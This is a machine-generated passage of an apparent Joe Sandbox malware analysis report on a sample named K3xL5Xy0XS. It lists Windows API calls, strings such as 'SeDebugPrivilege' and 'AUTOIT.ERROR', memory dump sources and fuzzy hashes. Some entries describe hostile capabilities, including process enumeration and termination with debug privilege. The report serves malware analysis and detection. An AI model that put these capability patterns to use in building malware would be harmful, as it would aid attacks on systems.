                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00221449,?,?,00000000), ref: 00221833
                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00221449,?,?,00000000), ref: 00221843
                                                                                  • GetCurrentProcess.KERNEL32(00221449,00000000,?,00221449,?,?,00000000), ref: 0022184B
                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00221449,?,?,00000000), ref: 0022184E
                                                                                  • CreateThread.KERNEL32(00000000,00000000,00221874,00000000,00000000,00000000), ref: 00221868
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                  • String ID:
                                                                                  • API String ID: 1957940570-0
                                                                                  • Opcode ID: 06f0bc6015575b20002b08cb506ccaccab48ff19510d6a6606dd4f566400aac2
                                                                                  • Instruction ID: 86b6889d2848cc8d33d9f7898be34c6b7370a2ae55742d5aef2f1694855995e6
                                                                                  • Opcode Fuzzy Hash: 06f0bc6015575b20002b08cb506ccaccab48ff19510d6a6606dd4f566400aac2
                                                                                  • Instruction Fuzzy Hash: E701CDB5640708BFE710AFB5EC4DF6B3BACEB89B11F108451FA05DB1A1DA709850CB24
                                                                                  APIs
                                                                                    • Part of subcall function 0022D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0022D501
                                                                                    • Part of subcall function 0022D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0022D50F
                                                                                    • Part of subcall function 0022D4DC: CloseHandle.KERNEL32(00000000), ref: 0022D5DC
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0024A16D
                                                                                  • GetLastError.KERNEL32 ref: 0024A180
                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0024A1B3
                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0024A268
                                                                                  • GetLastError.KERNEL32(00000000), ref: 0024A273
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0024A2C4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                  • String ID: SeDebugPrivilege
                                                                                  • API String ID: 2533919879-2896544425
                                                                                  • Opcode ID: 69b4fd78cf519df254a531924a4f813d1b525a9911095d850433ff2fac932948
                                                                                  • Instruction ID: b396edb2d405fecae3ff5ef57f373a3df6f093349d263a46f299968c24f2ea34
                                                                                  • Opcode Fuzzy Hash: 69b4fd78cf519df254a531924a4f813d1b525a9911095d850433ff2fac932948
                                                                                  • Instruction Fuzzy Hash: 9D61B130254342AFD724DF18D494F1ABBE1AF54318F14848CE86A8B7A3C7B2ED55CB92
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00253925
                                                                                  • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0025393A
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00253954
                                                                                  • _wcslen.LIBCMT ref: 00253999
                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 002539C6
                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002539F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window_wcslen
                                                                                  • String ID: SysListView32
                                                                                  • API String ID: 2147712094-78025650
                                                                                  • Opcode ID: 2517a8e347f1ba2ad98e63a9398f0eaacf8fec7191b3458a61c8d93302df2fc7
                                                                                  • Instruction ID: 6dbe452cebf690eb75187d5f290542f76bd576af6dc1a5fabc7deafe9e6e131a
                                                                                  • Opcode Fuzzy Hash: 2517a8e347f1ba2ad98e63a9398f0eaacf8fec7191b3458a61c8d93302df2fc7
                                                                                  • Instruction Fuzzy Hash: 1441D571A10309ABEF21DF64CC49BEA77A9EF08391F101526F948E7281D770DEA4CB94
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0022BCFD
                                                                                  • IsMenu.USER32(00000000), ref: 0022BD1D
                                                                                  • CreatePopupMenu.USER32 ref: 0022BD53
                                                                                  • GetMenuItemCount.USER32(014E5D00), ref: 0022BDA4
                                                                                  • InsertMenuItemW.USER32(014E5D00,?,00000001,00000030), ref: 0022BDCC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                  • String ID: 0$2
                                                                                  • API String ID: 93392585-3793063076
                                                                                  • Opcode ID: 2fa003c478103cbfc45c232780722b7297e13d28ae60f1145f6529e39c7722d8
                                                                                  • Instruction ID: 8524e4fbb6292a3738d31c877a943408babb955bf213c9192aac945bc4bee550
                                                                                  • Opcode Fuzzy Hash: 2fa003c478103cbfc45c232780722b7297e13d28ae60f1145f6529e39c7722d8
                                                                                  • Instruction Fuzzy Hash: B151BF70A10326BBDF12CFE8E888BEEBBF4BF45314F244159E451A7291E7B09961CB51
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 0022C913
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconLoad
                                                                                  • String ID: blank$info$question$stop$warning
                                                                                  • API String ID: 2457776203-404129466
                                                                                  • Opcode ID: 041e1db47e035b137c40b805964b20f9fc1597dedc3f91c609d0e29d6652e54e
                                                                                  • Instruction ID: d74bffd0dbc5aade8e6884da361ef547e4992b0adb46c61ff098aac4414f4ad9
                                                                                  • Opcode Fuzzy Hash: 041e1db47e035b137c40b805964b20f9fc1597dedc3f91c609d0e29d6652e54e
                                                                                  • Instruction Fuzzy Hash: 61110B356A9727BAA7016B94BC82DBE679CDF15725B30002AF500A72C1E7B05D505269
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$LocalTime
                                                                                  • String ID:
                                                                                  • API String ID: 952045576-0
                                                                                  • Opcode ID: 021c7513f629fb42b6ae9bbe4a9d70fb93f9f4b49143de163298f1a0c183f0dd
                                                                                  • Instruction ID: 78ec8c8ba528d390be07d57131c9b12f01cadaecd83a8fec787d2c10b651ac24
                                                                                  • Opcode Fuzzy Hash: 021c7513f629fb42b6ae9bbe4a9d70fb93f9f4b49143de163298f1a0c183f0dd
                                                                                  • Instruction Fuzzy Hash: 5F41D365C1066976CB11EBF5988AACFB3ACAF25310F518462F614F3122FB34E255C3E6
                                                                                  APIs
                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 001DF953
                                                                                  • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 0021F3D1
                                                                                  • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0021682C,00000004,00000000,00000000), ref: 0021F454
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: 6c924359380a1844335b5a1ff07103769bf096defc50cc7d14bc374cffd09237
                                                                                  • Instruction ID: 094ac483624b61d001791cecbfffcb41b3ea68b2569ad4430365849e980595ee
                                                                                  • Opcode Fuzzy Hash: 6c924359380a1844335b5a1ff07103769bf096defc50cc7d14bc374cffd09237
                                                                                  • Instruction Fuzzy Hash: 57414C30914780BED77D8F2999AC76A7BD1AB55318F14403EF05B56760D7719AC2CB10
                                                                                  APIs
                                                                                  • DeleteObject.GDI32(00000000), ref: 00252D1B
                                                                                  • GetDC.USER32(00000000), ref: 00252D23
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00252D2E
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00252D3A
                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00252D76
                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00252D87
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00255A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00252DC2
                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00252DE1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3864802216-0
                                                                                  • Opcode ID: ec24e54333617559c9aabe76636eaa07be6ca03c5231434a8cc674a50a8f09f7
                                                                                  • Instruction ID: f580288ac85c20d23f7aeda60b8be4fcf807858588e6a80a1803625f7c680311
                                                                                  • Opcode Fuzzy Hash: ec24e54333617559c9aabe76636eaa07be6ca03c5231434a8cc674a50a8f09f7
                                                                                  • Instruction Fuzzy Hash: BA31AB72211310BFEB148F10DC8AFEB3BADEB4A712F044055FE089A291D6758C54CBA8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 2931989736-0
                                                                                  • Opcode ID: ec147e19d3b9b34ba076515dd471715fb356a3a321b096e610e1d483f61f983a
                                                                                  • Instruction ID: 4494b00044dcd757f48fe2df523fe449edb0101bb2e17ba2bde47adfc31ec859
                                                                                  • Opcode Fuzzy Hash: ec147e19d3b9b34ba076515dd471715fb356a3a321b096e610e1d483f61f983a
                                                                                  • Instruction Fuzzy Hash: 32212571A70E7A7792189961AE82FBF334DAF21396F488031FD049A585F770ED3481A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                  • API String ID: 0-572801152
                                                                                  • Opcode ID: c0b87a99cf3c1da1234bae48bb5c67449889ec90b38360e32be984ad5de9ddd8
                                                                                  • Instruction ID: 997fcf69abf874463165f6a633b0d2793f780f67cbea63be6310c6ea91a6d587
                                                                                  • Opcode Fuzzy Hash: c0b87a99cf3c1da1234bae48bb5c67449889ec90b38360e32be984ad5de9ddd8
                                                                                  • Instruction Fuzzy Hash: 53D1D375A1071AAFDF14CF98C880FAEB7B5BF48344F148069E959AB282E7B0DD51CB50
                                                                                  APIs
                                                                                  • GetCPInfo.KERNEL32(?,?), ref: 002015CE
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00201651
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002016E4
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 002016FB
                                                                                    • Part of subcall function 001F3820: RtlAllocateHeap.NTDLL(00000000,?,00291444,?,001DFDF5,?,?,001CA976,00000010,00291440,001C13FC,?,001C13C6,?,001C1129), ref: 001F3852
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00201777
                                                                                  • __freea.LIBCMT ref: 002017A2
                                                                                  • __freea.LIBCMT ref: 002017AE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                  • String ID:
                                                                                  • API String ID: 2829977744-0
                                                                                  • Opcode ID: c9d0570bc63c4edf3a41ea3c1e4d4afb43ac2eed5978e86ed75e25d24544327d
                                                                                  • Instruction ID: 74ad6c270e8e82e02713d2ad67c2fb4ff0f5ba210ecf65edd94880f22b4cf629
                                                                                  • Opcode Fuzzy Hash: c9d0570bc63c4edf3a41ea3c1e4d4afb43ac2eed5978e86ed75e25d24544327d
                                                                                  • Instruction Fuzzy Hash: 7091B471E203169FDB208E64CC85AEEBBB9AF49310F584659E905EB1D2D735DC70CB60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit
                                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                  • API String ID: 2610073882-625585964
                                                                                  • Opcode ID: 307c945ceb12c0c3715cb4950e2689caa81a8b6ac2ba8cd8475290420c9e1c77
                                                                                  • Instruction ID: 8395b91bef243e90dcf32dde4893bc22e28e210fdb6814de8046c531f8c9b48c
                                                                                  • Opcode Fuzzy Hash: 307c945ceb12c0c3715cb4950e2689caa81a8b6ac2ba8cd8475290420c9e1c77
                                                                                  • Instruction Fuzzy Hash: 5F91A571A10215AFDF28EFA4CC88FAEB7B8EF46714F108559F515AB280D7709951CFA0
                                                                                  APIs
                                                                                  • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0023125C
                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00231284
                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002312A8
                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002312D8
                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0023135F
                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002313C4
                                                                                  • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00231430
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                  • String ID:
                                                                                  • API String ID: 2550207440-0
                                                                                  • Opcode ID: 51c783bde1d4883dd72e5a764181cb70460495d0f74fd3d1c238c26cea7aab86
                                                                                  • Instruction ID: b1802717038773773746f731794d343108bb01756482188a1ad510de8d1c29c0
                                                                                  • Opcode Fuzzy Hash: 51c783bde1d4883dd72e5a764181cb70460495d0f74fd3d1c238c26cea7aab86
                                                                                  • Instruction Fuzzy Hash: C491E3B1A202199FEB00DF98D885BBE77B5FF44715F10402AE911E7291D774E961CB90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                                  • String ID:
                                                                                  • API String ID: 3225163088-0
                                                                                  • Opcode ID: f299cb3dbb08b7c7985c70b283b2d6658a7bfd6ca53c4f2c59a8fff99d05a550
                                                                                  • Instruction ID: 7f632c3bd7bcbf1614cce2c09982e64c6833b9947a9e8c8a6246ec0bb4047cca
                                                                                  • Opcode Fuzzy Hash: f299cb3dbb08b7c7985c70b283b2d6658a7bfd6ca53c4f2c59a8fff99d05a550
                                                                                  • Instruction Fuzzy Hash: 37913971D00219EFCB14CFA9DC88AEEBBB8FF89320F148556E515B7251D374AA52CB60
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(?), ref: 0024396B
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00243A7A
                                                                                  • _wcslen.LIBCMT ref: 00243A8A
                                                                                  • VariantClear.OLEAUT32(?), ref: 00243C1F
                                                                                    • Part of subcall function 00230CDF: VariantInit.OLEAUT32(00000000), ref: 00230D1F
                                                                                    • Part of subcall function 00230CDF: VariantCopy.OLEAUT32(?,?), ref: 00230D28
                                                                                    • Part of subcall function 00230CDF: VariantClear.OLEAUT32(?), ref: 00230D34
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                  • API String ID: 4137639002-1221869570
                                                                                  • Opcode ID: 3e23d54ace571641756628f0974517556be612eb6cee699b130daf0a2d391180
                                                                                  • Instruction ID: c292e5d372d089245d4b5db1f82963f357975e86b789ea537052a76f1a6a2d4f
                                                                                  • Opcode Fuzzy Hash: 3e23d54ace571641756628f0974517556be612eb6cee699b130daf0a2d391180
                                                                                  • Instruction Fuzzy Hash: FD9145746183059FC704EF64C485A6AB7E5FF98314F14882EF88A9B391DB30EE15CB92
                                                                                  APIs
                                                                                    • Part of subcall function 0022000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?,?,0022035E), ref: 0022002B
                                                                                    • Part of subcall function 0022000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220046
                                                                                    • Part of subcall function 0022000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?,?), ref: 00220054
                                                                                    • Part of subcall function 0022000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0021FF41,80070057,?), ref: 00220064
                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00244C51
                                                                                  • _wcslen.LIBCMT ref: 00244D59
                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00244DCF
                                                                                  • CoTaskMemFree.OLE32(?), ref: 00244DDA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
